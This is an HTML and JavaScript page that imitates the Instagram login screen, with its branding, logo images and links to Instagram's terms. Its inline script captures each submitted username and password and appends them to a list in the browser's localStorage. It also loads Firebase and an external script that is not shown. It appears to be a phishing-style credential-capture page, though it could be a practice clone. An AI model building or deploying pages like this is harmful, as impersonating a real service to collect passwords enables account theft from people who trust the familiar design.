<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href=" https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link
        href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
        rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>instagram/login</title>
    <style>
        * {
            padding: 0px;
            margin: 0px;
            text-decoration: none;
            box-sizing: border-box;
            font-family: "Roboto", sans-serif;
        }

        .main {
            max-width: 420px;
            margin: auto;
            padding: 5%;
            /* border: 1px solid black; */
            border-bottom: 0.1px solid #757575;
        }

        .dropdown {
            left: 40%;
            border: none;
            width: 100px;
            background-color: white;
        }

        .logo img {
            width: 100%;

        }

        .logo {
            max-width: 200px;
            padding: 45px 0px;
        }

        .logo+a {
            /* width: 100%; */
            /* background-color: #1877F2; */
            /* border: none;
            outline: none; */
            font-weight: 900;
            color: white;
            /* padding: 10px; */
            border-radius: 7px;
        }

        .logo+a button {
            width: 100%;
            background-color: #1877F2;
            border: none;
            outline: none;
            font-weight: 500;
            color: white;
            padding: 10px;
            border-radius: 7px;
        }

        .logo+a button i {
            color: white;
            font-size: 20px;
            /* padding-right: 1%; */

            margin-right: 2%;
        }

        .logo+a+div {
            padding: 30px 0px;
            max-width: 100%;
            display: flex;
            align-items: center;
            /* margin: auto; */
        }

        .logo+a+div img {
            margin: auto;
            width: 100%;
        }

        .uSer {
            max-width: 100%;

        }

        .uSer input {
            width: 100%;
            padding: 8px;
            border-radius: 3px;
            font-weight: 450;
            border: 2px solid #DBDBDB;
            outline-color: grey;
        }

        .passWord {
            padding: 0px 8px 0px 8px;
            max-width: 100%;
            border: 2px solid #DBDBDB;
            margin-top: 10px;
            border-radius: 3px;
        }

        .passWord input {
            width: 80%;
            border: none;
            font-weight: 450;

            outline: none;
        }

        .passWord p {
            font-size: 10px;
            font-weight: 700;
            opacity: 0;
            color: #757575;
            transition: 0.3s;
        }

        .passWord span {
            padding-left: 3%;
            color: #757575;
            font-weight: 500;
        }

        .forgot {
            color: #0095F6;
            text-align: right;
            font-weight: 500;
            padding: 15px 0px;
        }

        .forgot a {
            text-decoration: none;
        }

        .forgot+button {
            width: 100%;
            background-color: #4CB5F9;
            border: none;
            outline: none;
            font-weight: 500;
            color: white;
            padding: 10px;
            border-radius: 7px;
        }

        .sigh {
            font-weight: 500;
            text-align: center;
            padding: 30px 0px;
            color: #757575;

        }

        .sigh a {
            text-decoration: none;
        }

        .term-policy {
            color: #757575;
        }

        .term-policy  a {
            color: black;
            text-decoration: none;
            font-weight: 500;
        }
        .section-2{
            font-size: 11px;
            color:#757575;
            text-align:center ;
            font-weight: 500;
            padding: 15px;
            /* border-top: 1px solid black; */
        }
    .dropdown button{
        border: none;
        outline: none;
    }
    </style>
</head>

<body><div class="main-con">
    <div class="main">
        <div class="dropdown  ">
            <button class="btn btn-white p-0 dropdown-toggle" type="button" data-bs-toggle="dropdown"
                aria-expanded="false">
                English
            </button>
            <!-- <ul class="dropdown-menu ">
                <li><a class="dropdown-item" href="#">Action</a></li>

            </ul> -->
        </div>
        <div class="logo mx-auto">
            <img src="images/instagram 1.svg " alt="">
        </div>
        <a href="https://en-gb.facebook.com/login/">
            <button><i class="fa-brands fa-square-facebook"></i>Continue with Facebook</button>
        </a>
        <div><img src="images/line.svg" alt=""></div>
        <form action=""  id="formhandler">
            <div class="uSer">
                <input type="text" id="userName" name="uname" placeholder="Phone number, username, or email"
                    width="100%" required>
            </div>
            <div class="passWord">
                <p class="m-0 passh">Password</p>
                <input type="password" id="userPass" placeholder="Password" name="upass" width="100%" required>
                <span id="hid-show"> Show </span>
            </div>
            <div class="forgot">
                <a href="https://www.instagram.com/accounts/login/"> Forgot password?</a>
            </div>
            <button  type="submit" id="login">Log in</button>
        </form>
        <div class="sigh">
            Don't havve an account?<a href="">Sigh up</a>
        </div>
        <div class="text-center term-policy">
            <p>By continuing you agree to Instagram's <span> <a
                        href="https://help.instagram.com/581066165581870/?locale=en_US">Terms of Use</a> </span> and
                <span><a href="https://www.facebook.com/privacy/policy/">Privacy Policy.</a></span></p>
        </div>

    </div>
    <div class="section-2">
        <p class="m-0">From</p>
        <img src="images/download.png" width="80" alt="">
    </div>
</div>

</body>

<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/7.14.1-0/firebase.js"></script>
<script src="script.js"></script>
<script>

    pass = document.getElementById('userPass')
    pass.addEventListener('click', () => {

        document.querySelector('.passWord').style.border = '2px solid grey '
    })

    pass.addEventListener('keyup', () => {
        if (pass.value != '') {
            document.querySelector('.passh').style.opacity = '1'
            pass.placeholder = ''
        }

        else {
            document.querySelector('.passh').style.opacity = '0'
        }

    })
    hidebutton = document.getElementById('hid-show')
    hidebutton.addEventListener('click', () => {

        if (pass.type == 'password') {
            pass.type = 'text'
            hidebutton.innerText = 'Hide'
        }
        else {
            pass.type = 'password'
            hidebutton.innerText = 'Show'
        }
    })

    login = document.getElementById('formhandler').addEventListener('submit', (event) => {


        event.preventDefault()

        alluserdata=JSON.parse(localStorage.getItem("user")) ?? []
        userdata = {
            id: event.target.uname.value,
            pass: event.target.upass.value
        }
        console.log(userdata);
        alluserdata.push(userdata)
        localStorage.setItem('user',JSON.stringify(alluserdata))

        event.target.reset();
    })
</script>

</html>